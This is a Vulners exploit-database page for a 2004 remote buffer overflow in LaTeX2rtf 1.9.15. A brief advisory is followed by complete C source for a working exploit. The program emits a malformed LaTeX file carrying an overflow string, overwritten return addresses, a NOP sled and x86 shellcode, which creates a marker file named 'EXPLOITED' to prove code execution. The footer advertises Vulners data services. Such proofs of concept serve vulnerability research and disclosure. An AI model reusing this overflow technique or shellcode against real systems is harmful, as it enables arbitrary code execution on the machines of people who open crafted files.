Lucene search
K

LaTeX2rtf 1.9.15 - Remote Buffer Overflow

🗓️ 21 Sep 2004 00:00:00Reported by D. J. BernsteinType 
exploitpack
 exploitpack
👁 23 Views

LaTeX2rtf 1.9.15 is vulnerable to remote buffer overflow, allowing arbitrary code execution.

Code
/*
source: https://www.securityfocus.com/bid/11233/info

It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.

Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.
*/

char center[] = {
  0x59                         /*   cx = *sp++                      */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0xc1, 0xe0, 0x07             /*   ax <<= 7                        */
, 0x50                         /*   *--sp = ax                 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /*   ax = 0x02563412                 */
, 0xc1, 0xe8, 0x18             /*   ax >>= 24                       */
, 0xc1, 0xe0, 0x08             /*   ax <<= 8                        */
, 0x50                         /*   *--sp = ax          512:O_CREAT */
, 0x51                         /*   *--sp = cx          "EXPLOITED" */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0xb0, 0x05                   /*   ax = (ax & ~255) + 5            */
, 0x50                         /*   *--sp = ax               5:open */
, 0xcd, 0x80                   /*   syscall                         */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x50                         /*   *--sp = ax                    0 */
, 0x40                         /*   ++ax                            */
, 0x50                         /*   *--sp = ax               1:exit */
, 0xcd, 0x80                   /*   syscall                         */
} ;

int main()
 
  int i;

  printf("\\def\\row#1{");

  for (i = 0;i < 1024;++i)
    putchar('x');
  for (i = 0;i < 6;++i) {
    /* preserve args[0] */
    putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
  }
  for (i = 0;i < 5;++i) {
    /* smasher */
    putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
  }

  for (i = 0;i < 256;++i)
    putchar(0x90);

  putchar(0xeb); putchar(sizeof(center));
  /* 0xeb 0x07   means   ip += 7 */
  /* assuming here that center has at most 255 bytes */

  for (i = 0;i < sizeof center;++i)
    putchar(center[i]);

  putchar(0xe8);
  putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
  /* 0xe8 0xf4 0xff 0xff 0xff   means   *--sp = ip; ip -= 12 */ 

  printf("EXPLOITED");

  printf("}\n");
  printf("\\begin{document}\n");
  printf("\\row a\n");
  printf("\\end{document}\n");
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation